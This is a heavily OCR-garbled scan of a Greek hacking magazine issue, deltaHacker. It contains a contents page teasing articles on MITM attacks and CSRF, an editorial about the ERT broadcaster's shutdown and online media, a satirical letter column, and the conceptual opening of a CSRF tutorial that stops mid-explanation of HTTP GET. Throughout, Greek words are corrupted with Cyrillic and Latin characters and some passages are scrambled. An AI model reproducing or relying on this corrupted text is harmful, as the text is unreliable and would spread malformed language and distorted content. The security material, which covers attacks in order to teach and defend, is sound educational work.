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ΕΦΥΡΕΣ 
για αποτελεσματικές 
επιθέσεις МІТМ [7] 


Γράψτε τα πρώτα σας web-apps, σε PHP 
Πώς θα φτιάξετε έναν πραγματικά ξεχωριστό router 
Επιθέσεις Cross-Site Request Forgery, αλλά για αρχάριους 


[*] Και δεν πειράζει που ως τώρα αγνοούσατε το bridging 


ΠΠ ЕМ 


εντιτορια 


w 
Χωρίς παραδοσιακή χρηματοδότηση και χωρίς πρό- 


σβαση στους παραδοσιακούς διαύλους επικοινωνίας, 01 
ανεξάρτητες ιδέες βρίσκουν, τελικά, τρόπο για να διαδί- 
δονται. О Γιάννης @arkoudos, πολύ χαίρεται γι’ αυτό. 


OVEIA HEI 


Μπορεί о παντοδύναμος Θεός να φτιάξει ἕνα 
Χριστουγεννιάτικο δέντρο τόσο μεγάλο, ώστε να 
µην του φτάνει ο χρόνος για να το στολίσει; Ο Θεΐος 
Ακάκιος γνωρίζει την απάντηση. 


Πλαστογραφημενες ὀικτυακες αιτῆσεις 


To Cross-Site Request Forgery δεν αποτελεί ιδιαίτερα 
γνωστή μέθοδο επίθεσης, αλλά να εἴσαστε σίγουροι 
ότι εἶναι αρκετά επικίνδυνη. Στο άρθρο μαθαίνουμε 

TI εἶναι και πῶς υλοποιείται, στήνοντας το κατάλληλο 
δικτυακό περιβάλλον και πραγματοποιώντας μερικά 

ενδιαφέροντα πειράµατα. 


Οἱ ὀικτυακες γεφυρες, 
αλλά ano την apxn 


Στον κόσµο των δικτύων υπάρχουν κάποιες τεχνολογίες για TIG 
οποίες ναι HEV µπορεί κάποτε να έχεις ακούσει κάτι, ωστόσο ποτέ 
δεν τους έχεις δώσει σημασία για πάνω από 8 δευτερόλεπτα. 
Κι όµως, αν τύχει και μάθεις καλύτερα σε TI αφορούν, τότε 
συναρπάζεσαι από τις πιθανές εφαρμογές και η ἁποιμή oou για 
TO τι εἶναι, π.χ., τοπικό δίκτυο, αλλάζει για πάντα. 


Avayvopicn χρωμάτων µε ro Arduino 


Μήπως θέλετε να κατασκευάσετε ένα απλό ρομποτάκι που κινείται 
ακολουθώντας µια γραμμή στο δάπεδο; Μήπως κάποιο εξελιγμένο, 
που ακολουθεί ένα συγκεκριµένο χρώμα; Μήπως πάλι θέλετε 
µόνο έναν απλό τρόπο για να διαβάζετε τα χρώματα των φυσικών 
αντικειμένων, ὥστε να τα αναπαράγετε στον υπολογιστή; 


с 


Bridging ото BSD, 


για routers κατηγορίας kick-ass! 


Αν σκοπεύετε να φτιάξετε τον δικό σας router ξεκινώντας από TO 
μηδέν, αν µη τι ἄλλο σας αξίζουν συγχαρητήρια. Στο ωραίο (και 
χρήσιμο) πρότζεκτ που ξεκινάτε, εἶναι πολύ πιθανό να καταφύγε- 
τε και στην τεχνική του bridging. Ακόμα καλύτερα, δηλαδή :) 


Web development σε περιβάλλον LAMP 
[μέρος 4] 


Έχοντας εξετάσει και την αντικειµενοστρεφή πλευρά της РНР, 
ξεμπερδέψαμµε µε ένα µεγάλο µέρος της θεωρητικής γνωριµί{- 
ας µε τη γλῶσσα. Σε αυτό το µέρος της σειράς µας θα αρχί- 
σουµε να αποκτάµε πιο στέρεη γνώση, χτίζοντας (επιτέλους) 
την πρώτη µας δικτυακή εφαρμογή! 


Επιθεσεις Man-in-The-Middle, 
με wireless bridging 
Παρουσιάζουμε, αναλυτικά και βῆμα προς βήμα, έναν 


πρωτότυπο τρόπο που µας επιτρέπει να εξαπολύουμε ETNI- 
θέσεις του εἴδους εύκολα, γρήγορα κι αποτελεσματικά. 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Варелас, Ανδρέας 


Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Πέτρος Κυλαδίτης, Γιώργος Мелекос, Νίκος 
Μουρατίδης, Νικόλαος Σηφάκης, Μέσος Παπαδόπουλος 
(TM), Χρίστος Τόμπρας 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται апо την Para- 
bing Creations δώδεκα φορές το χρόνο, κάθε μήνα. Н Parabing Creations ἐχει την έδρα 
της στη Μαιώτιδος 3, 55133, Καλαμαριά. О δικτυακὀς τόπος του περιοδικού εἶναι στο 
http://deltahackergr. To email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικἁ 
για τις συνδρομές εἶναι το subscriptions@deltahacker.gr. Οι γενικὲς πληροφορἰες για τις 
συνδρομές παρατίθενται ото http://deltahacker.gr/subscriptions και οι ἴδιες οι παραγγελἰες 
γίνονται ano το http://deltahacker.gr/pdfi2order. Όλες οι απόψεις που εκφράζονται ora 
ἀρθρα δεν εκφράζουν απαραίτητα και τη γνώμη του περιοδικού. 


(5) deltaCast s01e12 | Armitage Hacking 
http: //deltahacker.gr/deltacast-s01e12 


H ηλεκτρονική EKOOON του денанаскег δεν 


έχει каша σχέση µε Ол! έχετε δει ως тора. 


Είναι portable ка! searchable = 


Επιτρέπει την κι аупурафи κειµένου, αλλά και 
την EKTUNWON. 


Είναι ndhe ηΦιότ-νντ-εις- και δείχνει Τέλεια παντού: 
στο tablet, στο smartphone και φυσικά στον υπολογιστή, 


A! n 'JAEKTOOVIKI] EKOOON του денанаскег 


δεν φέρει τεχνητούς περιορισμούς καὶ 
δεν τιμωρεί τον катохо της. 


Στηρίξτε τη δουλειά µας κι επιτρέψτε μας να τη 
συνεχίσουμε. 


4 
АПОКТПОТЕ τωρα μία апо тс ηλεκτρονικές 
συνδρομές στο περιοδικό deltaHacker. 
Ki εσείς. 
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by @arkoudos 


| Δεν θα έπρεπε va εἶμαι αγενἠς, To ξέρω. Прота εὐχεται o кодџос — κι ἐτσι ἄλλωστε TE- 
, λείωσε και To editorial µου, oro deltaHacker 026. Αλλά, ὁπως ἔλεγα και πριν, το 2013 гуме 
κάτι συνταρακτικὀ, кат! που, гуф τουλάχιστον, δεν gixa υπολογίσει OT! θα γινόταν, ὀχι τόσο 
σύντομα, OXI τόσο εντυπωσιακἀ. Каталавајугте, Aoinóv, ὁτι βιάζομαι λίγο να porpacro pači 
; σας rov ενθουσιασμὀ µου. 


Δεν амафероџа! στις γραμμές VDSL, στα smartphones ἡ στα tablets που έχουν κατακλύσει 
τον τόπο κ.λπ. Αφορά στην τεχνολογία о ενθουσιασμὸς µου, ωστόσο αναφέρομαι στην pE- 
à τάβαση της ενημέρωσης апо την ЕРТ, δηλαδἠ апо την τηλεόραση, στο Διαδίκτυο. 


Όπως ὁλες oi μεγάλες γέἐννες, βέβαια, ETO! κι αυτή ἠρθε βίαια, µε δάκρυα και πολὺ πόνο: 
Χρειάστηκε µια απαράδεκτη, просопіка πιστεύω, κυβερνητική µεθὀδευση, µπόλικη δόση 
υποκρισίας, µια δόση προσωπικού μεγαλείου, ἆθλιο παρελθὀν πολλών ετών, ша τζούρα 
Νέρωνα, και ша αψυχολόγητη απόφαση. 


Όλα αυτά σκότωσαν την συµβατικἠς μετάδοσης Ελληνική Ραδιοφωνία και Τηλεόραση, και 
γέννησαν ἄλλη ша ελπίδα για το Διαδίκτυο — την πιο µεγάλη μέχρι тора, τουλάχιστον κατ' 
εμέ. Пат! ελπίδα; Εξηγούμαι. 


Όταν η κυβέρνηση κατέβασε Ta ρολά, οι εργαζὀµενοι ἐνιωσαν την ανάγκη να μιλήσουν — 
για πρώτη фора, ἰσως-- για τον εαυτό τους. Ki GUTO *dEv* μπορεί να уме! απὀ τις διόδους 
των παραδοσιακὠν ΜΜΕ — ὀχι τουλάχιστον τόσο εὐκολα. Επέλεξαν ἐτσι, апо ανάγκη, то 
µόνο διαθέσιμο μέσο: το Διαδίκτυο. 


Н ανταπὀκριση του κόσμου ἦταν πρωτοφανής. Στα δικἁ µου, αθώα μάτια, ἐμοιαζε --ἰσως 
υπερβολικάἁ-- µε Eva "δικτυακό Σύνταγμα". Εκατομμύρια κόσμου, каде ηλικἰας, χωρίς ana- 
ραιτήτως προηγούμενη σχέση µε το μέσο, ἐμαθαν от! η "ελεύθερη" ΕΡΤ εκπέμπει ano τη 
μικρή οθόνη rou υπολογιστή, µε URLs που алласам κάθε λίγο, κι OX! πια ano την μεγάλη 
οθόνη του παραδοσιακού κουτιού. Ενεπλάκη λοιπὀν ο κόσμος σε µια διαδικασία που θύμιζε 
ενοχλητικἁ το "εδώ πολυτεχνείο" --δεν επιχειρὠ каша σύνδεση апо πλευράς περιεχομέ- 
VOU, φυσικἀ-- μόνο που ropa δεν μιλούσαμε για πειρατικὀ ραδιόφωνο, αλλά για anAn, 
δικτυακἠ μετάδοση σήματος. 


Н δε μεγάλη οθόνη της τηλεόρασης δεν ἑκρυψε τα δόντια της "συμπαράστασής" της. Прау- 
| ματι, пара την "πειρατική" екпоџпћ των εργαζομένων της ΕΡΤ, η οποία θα μπορούσε να 

| αποτελἑσει εἰδηση --για να µην πω υλικὸ συμπαράστασης μεταξύ συναδέλφων-- OX! μόνο 
εφαρμόστηκε απόλυτη σιγἠ ιχθύος, αλλά κι όταν то ...κομμουνιστικότατο, пала! ποτὲ 902 
Τν, ξεκίνησε την αναμετάδοση του δικτυακού σήματος της ΕΡΤ, ἄρχισε ἑνα ἄνευ προηγου- 

μένου, απἰστευτο παιχνίδι "ropa μπορείς να παίξεις — тора σε Aoyokpivo" µε την Digea. 
` Ξέρετε кала ano nore εἰχαμε να δούμε τόσο "ελεύθερη τηλεόραση", ETO! δεν εἶναι; [*] 


' Φανταστείτε: Οι εργαζόµενοι στον Ελληνικὀ, коЛосотаіо τηλεοπτικὀ φορέα, ма βασίζονται 
темка σε ша εταιρεία που μάλλον ανερχόμενη θα την έλεγες, την BitsnBytes [**], προκει- 
μένου να ενημερώσει το ασύλληπτο πλήθος κόσμου που ἤθελε ν' ακούσει ша διαφορετικἠ 


anown an' αυτή του κυβερνητικού εκπροσώπου (την τωρινή, OXI TOU 2012, nou боо να 'vai 
ἠταν κομμάτι διαφορετικἠ). 


Και υπενθυμἰζω от! η εναλλακτική ánour κατάφερνε ма ακουστεἰ пара τις επιλογὲς εκείνων 
που ελέγχουν τη συµβατικἠ PON ενημέρωσης, καθώς κι εκείνων που απροκάλυπτα Aoyokpi- 
νουν TO τηλεοπτικὀ ойра, για ξεκάθαρα πολιτικούς λόγους. 


Oa µου επιτρέψετε ма πω ὁτι κάποιες μάσκες ἐπεσαν το 2013 — και μάλιστα προκάλεσαν 
μεγάλο θόρυβο. 


Αλλά δεν ἦταν μόνο η υπόθεση της ΕΡΤ, που κατέδειξε ὁτι υπάρχουν και οι εναλλακτικὲς 
πηγὲς ενημέρωσης. To OmniaTV.com, για παράδειγµα, συνεχίζει να εκπέμπει εικόνα, то 
Radiobubble.gr κἀνει ακόμα τις ραδιοφωνικὲς του εκπομπές, evo το ThePressProject.gr 
παρέχει ша αξιόλογης ποιότητας δικτυακἠ επιλογἠ ano streams. 


Όλα αυτά, 000 κλισέ κι αν δείχνει αυτὀ που θα γράψω, δεν θα γίνονταν χωρὶς τις δικἐς 
σας δυνάμεις. Τα μέσα που προανέφερα, μαζὶ µε ra παραδοσιακἠς μορφής —алла, σας δι- 
αβεβαιώνω, ὀχι παραδοσιακἀ парауоџема— Unfollow, HotDoc, deltaHacker (και deltaCast) 
[***], ἐχουν την απόλυτη ανάγκη της στἠριξἠς σας. 


Χωρίς πρόσβαση στις παραδοσιακὲς πηγὲς χρηματοδότησης, τα περισσότερα αντισυµβατι- 
ка μέσα ἐχουν ανάγκη της δικἠς µας χορηγίας, ὥστε να συνεχίσουν va υφίστανται και va 
δημιουργούν και να εκφράζουν γνώμη ελεύθερα — κι όχι ὁπως θέλουν ἆλλοι. 


Δεν κρίνω ra αποτελέσµατα. Σε ἄλλους αρέσουν, σε ἄλλους ὀχι. Άλλοι, π.χ., τα βρίσκουν 
αμιγώς επαναστατικἀ, ἄλλοι θεωρούν ὁτι αποτελούν τη δικτυακἠ µορφή rou λαϊκισμού. Δεν 
εἶναι ανάγκη να συμφωνήσετε καν μαζὶ µου για τα ата πίσω апо την ἐλευσὴ τους. Ίσως 
να σκέφτεστε Ori όλα ξεκίνησαν ano ша ανάγκη yia κάθαρση, ἰσως ма υποψιάζεστε ὁτι та 
κίνητρα ἦταν η επιθυμία για ενηµέρωση χωρίς λογοκρισία, ἰσως va υποψιάζεστε και кат! 
ἆλλο: Σε каде περίπτωση, δεν χρειάζεται va συμφωνούμε. 


Ey% κρατάω --και μοιράζομαι μαζὶ σας-- τα εξἠς: Τη στιγμή nou τα ελεγχόμενα µέσα (апо 
κυβερνήσεις, διαφημιζόμενους, παραδοσιακὲς αντιλήψεις) πίστευαν TI ἐχουν τον απόλυτο 
ἐλεγχο, η μόνη διέξοδος για κάθε ανεξάρτητη ιδέα φάνηκε va εἶναι η τεχνολογἰα και то 
Διαδίκτυο. 


Аџто σύντομα θα αλλάξει, μάλλον. Toon ελευθερία δεν περιμένω va παραμείνει για πολὺ 
ανεκτἠ. Θα θυμόσαστε ἡ θα ἐχετε μάθει τι έγινε στο παρελθὀν, µε то NEIPATIKO ραδιόφωνο. 
Αλλά ово μπορούμε και προλαβαίϊνουμε va το απολαμβάνουμε μέσα то 2014, ας то ano- 
λαμβάνουμε. Τι λέτε κι εσεἰς; Και κυρίως, ας αντιληφθούμε *ylaTi* δημιουργήθηκε αυτή 
η ανάγκη yia εναλλακτικὲς πηγὲς ενημέρωσης. Ема: μάλλον το καλύτερο µάθηµα που θα 
μπορούσαμε να έχουμε απ' αυτή την ιστορία. 


[*] Ίσως να θυμόσαστε ro Alter kai την Digea, που rou κατἐβαζε το σήμα слуа сүй: прота 
την ποιότητα, μετὰ την εικὀνα. Εἶχαμε δει, δηλαδή, ra προεόρτια πριν τη φετινή, ωμή na- 
ρέµβαση. Н ανύπαρκτη αντἱδρασὴ µας, τότε, επέτρεψε εν πολλοὶς να συμβούν αρκετά an' 
ὁσα συνέβησαν το 2013. 


[**] Н onoia BitsnBytes, ναι μεν εἶχε καταφέρει та δύο ἄλλα, μεγάλα βήματα του διαδικτύ- 
ου, та мтокиџамтер Debtocracy και Catastroika, ωστόσο κανεἰς δεν μπορούσε ма φαντα- 
оте! OT! θα άντεχε στο χρόνο. 


[***] ΣΤ.Ε. Ano та τέλη του περασμένου Απριλίου, ro περιοδικὀ deltaHacker κυκλοφορεί 
σε αποκλειστικἁ ψηφιακἠ µορφή. 


OVELA μξνλ 


Αγαπητοί µου, 

Χρονιάρες μέρες HAL πάλι, καν λέω ν' αρχίσω την επιστολή POV µε µια 
παραδοξολογία xov την λέγαμε μικροί στο σχολείο για να δανμονίσουμε, 
ούτως ειπείν, τον δάσκαλό µας των θρησκέυτικῶν. 


"Αν ο θεός είναν παντοδύναμος", τον βωπάγαμε, "μπορεί να φτιάξει έναν 
βράχο τόσο µεγάλο που να µην µπορεί να τον anxagevj" 


Φυσικά δεν το είχαµε βγάλεν εμείς, алб κάπου το είχαμε ακούσει, αλλά 
γνα το εφέ έκανε ша χαρά. О θρησκευτικός µας πράγματι δαιμονιζόταν 
καν πάσχιζε να µας απαντήσεν είτε µε φοβέρες γνα την ασέβειά µας, είτε pe 
αμήχανους ταυτολογικούς συλλογιυστικούς μαιάνδρους. 


Ἡ αδυναμία του θρησκευτικού µας µου φαίνεται σήμερα ελαφρώς περίερ- 
Yn. Διότν η αναίρεση αυτής της παραδοξολογίας είναι σχετικώς απλή. Αυτό 
βέβανα το κατάλαβα αργότερα, δεν το ἠξερα τότε που ήμασταν στο σχο- 
λείο. 


Νομίζαμε, τότε, OTL είχαµε καταδείξει pra θεμελιώδη αντινοµία στο δόγ- 
μα καν δεν µας εξέπληττε το OTL ο θρησκευτικός µας δανμονιζόταν. Μας 
φαινόταν αναμενόμενο. 


Фер... Н αλαζονεία της νεολαίας. 


Δεν καταλαβαίναµε πως η αντινοµία δεν βρισκόταν στο δόγµα αλλά στο 
ίδιο το ερώτημα. 

Όταν αναρωτιέσαν για το αν µια οντότητα (ο θεός εν προκειμένω) µπορεί 
ή δεν µπορεί να σηκώσει κάτι, εἶναι σαν να δέχεσαι OTL η οντότητα αυτή 
βρίσκεται στον (бео κόσμο µε τον δικό σου, παν OTL UMOKELTAL στους ἴδιους 
µε σένα περινορισμούς -π.χ. μάζα, βαρυτική έλξη, στρέβλωση χωροχρόνου 
K.XX. κ.λπ. Όμως αυτό το έχεις υποθέσει. Δεν το έχεις αποδείξεν. Н σκέφη 
σου είναν πυμλική. 

Πρώτα πρέπεν να στηρίξεις όλες τις υποθέσεις σου, KAL µετά να κάνεις 
τον έξυπνο στον θρησκευτικό σου. 

Αν το επιχειρήσεις, όµως, θα δεις OTL δεν ἔχεν παν νόημα να προσπαθή- 
σεις γνατί --εξ ορισμού-- ο θεός εκλαμβάνεται ως ο δημιουργός του κό- 
OUOU τούτου και Νόχι ως ένας απὀ τους κατοίκους του. 

To ερώτημά σου είναι άκυρο. 

Είναν σαν να αναρωτιέσαι πώς καν ο Όμηρος δεν είχε πέσει καν αυτός 
θύμα του σαγηνευτικού τραγουδιού των Σενρήνων. 

То σκεφτόμουν, λοιπόν, το θέμα αυτό προ ημερών, που μιλούσαμε µε την 
εξαδέλφη γνα τα Χρυσά Αβγά καν yla την ανάκαµφη, E% νέου, των δημοσκο- 
πνκών ποσοστών τους. 

Н θέση pov για το ζήτημα, αγαπητοί µου, exer αποπρνυσταλλωθεί. Н συ- 
γκεκρυμένη οργάνωση πρέπεν να απαγορευτεί. Απλά καν σταράτα πράγματα. 
Πρέπει να απαγορευτεί εδώ καν τώρα. 


Αλλά --προσοχή σε αντό-- να απαγορευτεί *OXI* επειδή δεν αρέσουν 
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Σνέιλ MÉLA 


LLL 


σε κάποιον ον ιδέες που πρεσβεύει. Ας πρεσβεύουν ό,τι θέλουν. KOUHLG τρώνε, κουκιά. μαρτυράνε, 
που θα έλεγε καν ο παππούς. Σ' αυτό δεν μπορώ να βοηθήσω. 


Н οργάνωση πρέπει να απαγορευτεί γνατί είναν εγκληματική. Και είναν εγκληματική επειδή 
мало από τον μανδύα της µισαλλόδοξης και εθνικιστικής ρητορικής κρύβονται άνθρωποι που 
οπλίζονταν, εκπαιδεύονταν στρατιωτικά, χτυπάνε, μαχανρώνουν, εκφοβίζουν, εκβιάζουν, δολοφο- 
νοῦν, 


AUTO είναν το εγκληµατικὀ. Ον ιδέες τους εἶναι ηλίθνες. Με αφήνουν παγερά αδιάφορο. Τα 
όπλα τους όμως σκοτώνουν. 


H εξαδέλφη είχε αντιρρήσεις. 


"Ma πώς μπορείς να ζητάς την απαγὀρευσή τους όταν βλέπεις OTL είναν το τρίτο κόμμα σε δύ- 
уат; Δεν σου ακούγεται αντιδηµμοκρατικό»" 


"ΑντιδημοκρατικόΣσ" εἶπα εγώ. "Καν δηλαδή πονος σου είπε πως τα θεμέλια της δημοκρατίας εἰ- 
Val δημοκρατικά} Καθόλου δημοκρατικά. δεν είναν." 

Н εξαδέλφη παρέμεινε σιωπηλή. 

"Κοίτα", συνέχισα, "πάρε γνα παράδειγµα τις εκλογές. Εκλογές Ὑίνονταν, είτε το θέλεις, είτε 
δεν το θέλεις. Κανείς δεν σε ρωτόεν αν σ' αρέσει να γίνονταν εκλογές καν κανείς δεν πρὀκειταν 
να ge ρωτήσει. Βκλογές γίνονται γνατί το λέεν το Σύνταγμα. Τέρμα. То Σύνταγμα δεν το έχουµε 
βάλεν εκεί για να το συζητάμε κάθε φορά. Αποφασίστηκε, ισχύει, πάεν τέλενωσε. Να το αλλάξεις 
δε γίνεταν µε το έτσι θέλω, θέλει δναδυκασίες, θέλεν δουλειά. Καν κάποια πράγματα δεν αλλάζουν 
µε τίποτα." 


"Nav..." ξεκίνησε να λέει η εξαδέλφη επιφυλακτικά. "Αλλά εγώ δεν είπα να αλλάξουμε το Σύ- 
νταγµα... Εγώ έλεγα OTL δεν μπορείς να απαγορέφεις ένα κόμμα επειδή δεν συµφωνείς µε αυτό. 
Е(уа αντιδημοκρατικό..." 

"Μα εδώ civar το λάθος. Δεν θα το απαγορέφεις επειδή δεν συµφωνείς. θα το απαγορέφεις 
επειδή κάτω από τον μανδύα του κοινοβουλευτισμού (xav απολαμβάνοντας την προστασία τον) 
αυτό το, τέλος πάντων, κόμμα δραστηρνοπονείταν σαν πρυφός στρατός που ετοιμάζεται үка. πό- 
λεμο. *AvtTÓ* είναν το τεκμήριο της εγκληματικότητας. Καν δεν νομιμοπονείταν, бсо, μπούφον καν 
να τους ψηφίσουν, 0,7; ποσοστό και να µαζέφεν στις εκλογές. Έτερον, εκάτερον." 


"Νμμ..." 

"Γνα να το πω πιο λιανά. Φαντάσου να γυνόταν αύριο δηµοφήφισμα µε το ερώτημα av θέλου- 
µε να γίνονταν δημοφηφίσματα στο μέλλον. Φαντάσου τώρα OTL κάπως µας ήρθε xv αποφασίσαμε 
όλον σύσσωμον OTL δεν θέλουμε. Τα βαρεθήκαμε. Τελεία. Δημοφηφίσματα τέρμα. Φαντάσου τώρα 
OTL περνάνε είκοσν χρόνια χωρίς δημοψηφίσματα καν αρχίζουμε να то ζξανασκεφτόµαστε. От, 
ἔχουν αρχίσει να µας Φιλολείπουν. Πώς θα το αποφασίσουµε να τα επαναφέρουμε, αν πλέον δεν 
μπορούμε να θέσουμε το ερώτημα σε δημοψήφισμα; Βλέπεις τν εννοώ; Βλέπεις την αντίφαση»" 


OVELA ре. 


18 


МНАСЈКЕК 


ANNS 


"Βλέπω..." 


Н οποία αντίφαση, αγαπητοί pov, είναν ίδιας τάξεως µε την αντίφαση 
στην ερώτηση περί θεού καν βράχου που σας έγραφα παραπάνω. Ελπίζω OTL 
το βλέπετε. 


Μ' αυτά καν μ' αυτά, λοιπόν, περνούν об μέρες καν συνειδητοπονώ πως 
έχουμε αίφνης φτάσει στα µέσα Δεκεμβρίον. 


Πονος θα το φανταζόταν. 


Είμαστε πλέον όλοι σε κέφι εορταστικὀ. Λέντρο δεν έχουµε στολίσεν 
ακόμα, καν δεν ξέρω αν θα στολίσουμε. Παίζεταν. 


То θέµα ανέκχυφε στο βραδινό µας τραπέζι, χτες Σάββατο, όπου τυμού- 
даме τον αννὠνό, GPTL αφυχθέντα απὀ την αλλοδαπή. To ανακίνησε ο ἰδιος, 
καθώς OOO απομακρύνεταν ало την παιδική ηλικία (δηλαδή: όσο πατάει η 
γάτα) τόσο τον πιάνει η νοσταλγία yla τα αγνά εκείνα χρόνια (λέμε τώρα). 


"Δέντρο δεν θα στολίσετε фётос;" ρώτησε αθώα. 


Δέροντας TL θα ακολουθούσε έσκυφα σεμνά. στο πιάτο μον, хь άρχισα 
να πηγαινοφέρνω µε το терору; POV τις πατάτες καν το κουνουπίδν. "Άλλο 
πράγμα το алоо Υγκόμπιν" είπα. 


Ме κοίταξαν όλον άβολα. 


"Eg... О συνδυασμός, εννοώ, πολύ τανριαστός. То σκόρδο, η πιπερόριζα, 
το πρεμμύδι ма, о κόλνανδρος δένουν πολύ αρμονικά µε τον KOUPKOUPG, τον 
ανθό μοσχοκάρυδου, καν τον μάραθο". 


Γνα λίγο επικράτησε ησυχία. Απουγόταν µόνο o ήχος μαχαιροπήρουνων 
σε πιάτα. 


Tnv ησυχία δνέκοφε η μητέρα της εξαδέλφης. "Оҳи", εἰπε. 


Συνέχυσα να πηγαννοφέρνω µε το πιρούνι µου τις πατάτες. Н Μαιρούλα 
μου έριξε ένα βλέμμα όλο ανησυχία καν µετά στράφηκε προς κανέναν συγκε- 
κρυμένα. "Μπορώ να έχω λίγο νάανΣ" ρώτησε προσεκτικά. 


H εξαδέλφη έσπρωξε την πιατέλα µε τα νάαν προς την μεριά της Μαιρού- 
λᾶς. 


"Δέντρο, Ххбеух θα στολίσω φέτος", συνέχισε η μητέρα της εξαδέλφης. Με 
έμφαση στο "στολίσω", αν καν δεν χρεναζόταν: Όλοι θυµόμασταν τις περσι- 
VEG περιπέτειες µε τα αγαλματίδια του Βισνού που λίγο έλειφαν να µετα- 
τρέφουν τη µικρή µας χριστουγεννιάτικη γωνιά. σε ινδουιστικὀ νερὀ. 


Н μητέρα της εξαδέλφης είχε δηλώσει (τότε) OTL του χρόνου (φέτος) θα 
απέχει από τις σχετικές προετοιμασίες. Τέτοιοι που είμαστε. 


Νομίζαμε ότι το είχε ξεχάσει. Αλλά πού να ξεχάσει. 
Δέντρο λουπόν φέτος YLOX. 


MeWape για λίγο σνωπηλοί. Αισθανόμασταν όλον το βάρος των περιστά- 
σεων. 


"Λοιπόν, αίνιγμα", είπα εγώ γνα να αλλάξω θέμα. 


"πείτε μον. Αν o θεός είναν παντοδύναμος, µπορεί να φτιάξεν ένα Χρι- 
στουγεννιάτικο δέντρο τόσο µεγάλο που να µην τον φτάνεν ο χρόνος να το 
στολίσευσ" 


"O θεός δεν ασχολείταν pe βλακείες", eie η μητέρα της εξαδέλφης. που 
είναν Ἰνδουνίστρνα. 


Έπνασα ξανά το терору. 


Σας ασπάζομαν, 
θείος Ακάκιος 


deltall 


HA@KER 


Στη 3η χρονιά και συνεχίζουμε ακάθεκτοι! 


Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 


Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 


Е twitter.com/deltaHacker 
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Πλαστογραφημένες δικτυακὲς αιτήσεις 


To Cross-Site Request Forgery δεν αποτελεῖ ιδιαίτερα γνωστή μέθοδο 
επίθεσης, αλλά να εἴσαστε σίγουροι ότι εἶναι αρκετά επικίνδυνη. Σε аџто 
το άρθρο ва µάθουμµε ri εἶναι και πὼς υλοποιείται, στήνοντας το κατάλληλο 
δικτυακὀ περιβάλλον και πραγματοποιώντας μερικά ενδιαφἐροντα 
πειράματα. Επιπρόσθετα, θα εξετάσουμε κι ёмам απλὀ μηχανισμό άμυνας. 


Πλαστογραφημένες δικτυακές αιτήσεις 
CLL 


Το Cross-Site Request Forgery (ñ απλά CSRF) апотеле! ша επἰθεση nou прауџато- 
ποιεῖται µε отохо κάποιο ευπαθές website. Ωστόσο το θύμα αυτής της επίθεσης δεν 
εἶναι το εκάστοτε website, οὐτε о server που το φιλοξενεί, οὐτε ο διαχειριστἠς TOU. 
Το θύμα αυτής της επίθεσης εἶναι κἄποιος ano τους χρήστες rou website! Н επἰθε- 
ση CSRF προβλέπει την ὑπουλη αποστολἠ δικτυακών αιτημάτων (requests) προς 
κάποιο website, χωρίς τη συναίνεση του χρήστη (επισκἐπτη). Ekei κολλάει και то 
"request forgery" , αφού τα αιτήματα μοιάζουν να προέρχονται апо τον χρήστη, ενώ 
στην πραγματικότητα εἶναι κατασκευασμένα ano τον επιτιθἐµενο. Ta εν Aóyo αιτἠ- 
рата κρύβονται σε ιστοσελίδες που EXE! επἰσης κατασκευάσει ο επιτιθέμενος, EVM 
παραπέμπουν σε ἀσχετα websites. Έτσι δικαιολογεῖται κι ο ὀρος "Cross-site", αφού η 
επίθεση λαμβάνει χώρα апо vav δικτυακὀ τόπο προς κάποιον ἄλλο. Όλα αυτά оџос 
εἶναι πολύ θεωρητικά. Ας δούμε για αρχὴ τι εἶναι αυτά τα δικτυακἀ αιτήματα και σε 
τι χρησιμεύουν, για να εξετάσουμε στη συνέχεια το noc μπορούν να αξιοποιηθούν 
ano τον επιτιθἐµενο. 


Αντικείμενα απάτης 


Όταν χρησιμοποιούμε τον ὀρο request (αἰτημα) αναφερόμαστε στις μεθόδους GET 
και POST, nou προσφέρει το πρωτόκολλο HTTP. Oi μέθοδοι αυτές χρησιμοποιού- 
νται σε ола τα websites για τη µεταφορά δεδοµένων απὀ το χρήστη προς том web 
server, για τη µεταφορά πληροφοριών апо ша σελἰδα σε ша ἄλλη, καθώς και για 
την ἴδια τη μεταφορὰ των ιστοσελίδων. Па να δούµε οποιαδήποτε σελἰδα ενὸς site, о 
browser αποστέλλει Eva аітпра GET στον web server και δηλώνει τη διεύθυνση της 
ζητούμενης σελἰδας. Н απάντηση апо τον web server περιλαμβάνει το περιεχόμενο 
κάποιας σελἰδας HTML, η onoia ενδέχεται να περιἐχει παραπομπὲς προς άλλα αρχεἰα 
(CSS, java script, εικόνες, φόρμες HTML που βρἰσκονται σε ξεχωριστά αρχεἰα к.а). 
Για καθένα апо αυτά τα αρχεία, o browser στέλνει και πάλι Eva αἰτημα GET, NTO- 
ντας ano том web server το OXETIKO περιεχόμενο. Όπως амафераџе προηγουμένως, 
η μέθοδος GET δεν χρησιμοποιείται μόνο για να προσπελάσουµε ша σελἰδα, алла 
και yia τη µεταφορά δεδομένων апо σελἰδα σε σελίδα. Χαρακτηριστικὀ παράδειγµα 
αποτελεί το λεγόμενο pagination. Проката για µια τεχνική που χωρίζει αυτόματα 
το περιεχόµενο σε ξεχωριστὲς σελίδες (n.x., σε κἄποιο δικτυακὀ κατάστημα, опоо та 
προϊόντα µιας κατηγορίας εμφανίζονται σε ξεχωριστές σελίδες, ἡ σε κἄποια μηχανή 
αναζήτησης, опоџ τα αποτελέσµατα της αναζήτησης χωρίζονται σε σελἰδες). Όταν 
χρησιμοποιείται το pagination, Ta URLs των επιµέρους σελίδων ενσωματώνουν στο 
τέλος τους διάφορες παραμέτρους (π.χ., "?раде=24"). E, λοιπὀν, αυτὲς oi παράμε- 
тро! αποτελούν δεδομένα που μεταφέρονται µε τη μέθοδο GET. Βέβαια, η κύρια 
αποστολἠ της GET δεν εἶναι η μεταφορὰ παραμέτρων και δεδομένων, ασχέτως NOU 
